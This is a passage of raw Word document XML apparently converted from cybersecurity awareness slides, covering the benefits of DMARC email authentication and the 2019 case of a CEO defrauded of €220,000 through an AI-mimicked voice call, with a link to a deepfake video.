          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="28.920000076293945"/>
          <w:szCs w:val="28.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292934"/>
          <w:sz w:val="33.959999084472656"/>
          <w:szCs w:val="33.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">asks recipient email services to provide reports of where email comes from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4365234375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1539.8799896240234" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="33.959999084472656"/>
          <w:szCs w:val="33.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="33.959999084472656"/>
          <w:szCs w:val="33.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="6762750" cy="2039239"/>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62750" cy="203923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9199523925781" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="0b0c0c"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="0b0c0c"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The benefit of DMARC are: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35400390625" w:line="239.90398406982422" w:lineRule="auto"/>
        <w:ind w:left="389.95994567871094" w:right="2822.581787109375" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="0b0c0c"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="0b0c0c"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">• Protecting your users, employees and reputation from cybercrime • Reducing customer support costs relating to email fraud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002075195312" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="389.9811553955078" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="0b0c0c"/>
          <w:sz w:val="36.040000915527344"/>
          <w:szCs w:val="36.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="0b0c0c"/>
          <w:sz w:val="36.040000915527344"/>
          <w:szCs w:val="36.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">• Improving trust in the emails your organisation sends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278198242188" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="389.95994567871094" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="0b0c0c"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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0b0c0c"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">• Seeing the legitimate and fraudulent use of your domains via DMARC reports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Multi layered approach</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80615234375" w:line="199.92000102996826" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:h="10800" w:w="14400" w:orient="landscape"/>
          <w:pgMar w:bottom="147.2000026702881" w:top="112.800292968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d2533c"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="8608695" cy="5880989"/>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8608695" cy="588098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00762939453" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>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Deep Fake Audio Calls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96044921875" w:line="239.90389823913574" w:lineRule="auto"/>
        <w:ind w:left="98.72001647949219" w:right="8164.0191650390625" w:firstLine="27.719993591308594"/>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In March 2019, the CEO of a large  energy firm sanctioned the urgent  transfer of €220,000 to what he  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:drawing>
          <wp:anchor allowOverlap="1" behindDoc="0" distB="19050" distT="19050" distL="19050" distR="19050" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4315561</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>112128</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4143375" cy="5114799"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="left" distB="19050" distT="19050" distL="19050" distR="1905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143375" cy="5114799"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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5361328125" w:line="239.88927841186523" w:lineRule="auto"/>
        <w:ind w:left="106.27998352050781" w:right="7984.019775390625" w:firstLine="8.280029296875"/>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believed to be the account of a new  Eastern European supplier after a  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="36.040000915527344"/>
          <w:szCs w:val="36.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">call he believed to be with the CEO  </w:t>
      </w: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of his parent company.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240478515625" w:line="239.9040126800537" w:lineRule="auto"/>
        <w:ind w:left="98.72001647949219" w:right="7803.65966796875" w:firstLine="0.7199859619140625"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pP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Within hours, the money had passed  through a network of accounts in  Latin America to suspected criminals  who had used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">artificial intelligence  (AI) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="292934"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to convincingly mimic the voice  of the CEO.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239501953125" w:line="239.59691047668457" w:lineRule="auto"/>
        <w:ind w:left="169.9939727783203" w:right="7743.583984375" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="a53926"/>
          <w:sz w:val="26.040000915527344"/>
          <w:szCs w:val="26.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="a53926"/>
          <w:sz w:val="26.040000915527344"/>
          <w:szCs w:val="26.040000915527344"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With one AI-enabled conversation, criminals had  bypassed layers of cybersecurity controls. Their  success illustrates how certain use of powerful  developing technologies such as AI will change the  landscape of cybercrime for both attackers and  defenders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7.70751953125" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="arial" w:cs="arial" w:eastAsia="arial" w:hAnsi="arial"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="ffffff"/>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ffffff"/>
          <w:sz w:val="27.959999084472656"/>
          <w:szCs w:val="27.959999084472656"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">66</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069091796875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="396.3999938964844" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:h="10800" w:w="14400" w:orient="landscape"/>
          <w:pgMar w:bottom="147.2000026702881" w:top="112.80029296875" w:left="335.12001037597656" w:right="226.10107421875" w:header="0" w:footer="720"/>
          <w:cols w:equalWidth="0" w:num="1">
            <w:col w:space="0" w:w="13838.778915405273"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deep Fake Videos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406494140625" w:line="219.53166961669922" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="d2533c"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="8283448" cy="4659503"/>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8283448" cy="4659503"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="93a299"/>
          <w:sz w:val="30.600000381469727"/>
          <w:szCs w:val="30.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36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.youtube.com/watch?v=yaq4sWFvnAY&amp;feature=emb_logo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="continuous"/>
      <w:pgSz w:h="10800" w:w="14400" w:orient="landscape"/>
      <w:pgMar w:bottom="147.2000026702881" w:top="112.80029296875" w:left="1440" w:right="1440" w:header="0" w:footer="720"/>
      <w:cols w:equalWidth="0" w:num="1">
        <w:col w:space="0" w:w="115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w:font w:name="Times"/>
  <w:font w:name="Noto Sans Symbols">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId1" w:subsetted="0"/>
    <w:embedBold w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId2"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